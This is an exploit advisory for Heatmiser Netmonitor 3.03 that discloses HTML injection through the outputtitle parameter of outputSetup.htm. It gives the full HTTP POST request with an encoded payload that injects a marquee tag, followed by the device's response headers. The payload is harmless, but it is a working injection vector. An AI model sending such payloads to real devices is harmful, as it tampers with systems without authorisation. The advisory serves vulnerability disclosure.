# Exploit Title: Heatmiser Netmonitor 3.03 - HTML Injection
# Date: 2019-12-22
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.heatmiser.com/en/
# Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf
# Software: Netmonitor v3.03
# Product Version: Netmonitor v3.03
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection
# CVE: N/A
# Description :
# Heatmiser Net Monitor v3.03 allows HTML Injection via the
# outputSetup.htm outputtitle parameter. The HTML Injection
# vulnerability was discovered in v3.03 version of Net Monitor
# from the Heatmiser manufacturer. This vulnerability is
# vulnerable to hardware that use this software.
# HTTP Post Request :
POST /outputSetup.htm HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://XXX.XXX.XXX.XXX
Connection: close
Referer: http://TARGET/outputSetup.htm
Upgrade-Insecure-Requests: 1
outputtitle=%22%3E%3Cmarquee%3ETEST%23undefined%23undefined%23undefined%23undefined%23undefined
# HTTP Response :
HTTP/1.1 200 OK
Date: Sun, 22 Dec 2019 20:25:22 GMT
Server: Z-World Rabbit
Connection: close
Content-Type: text/html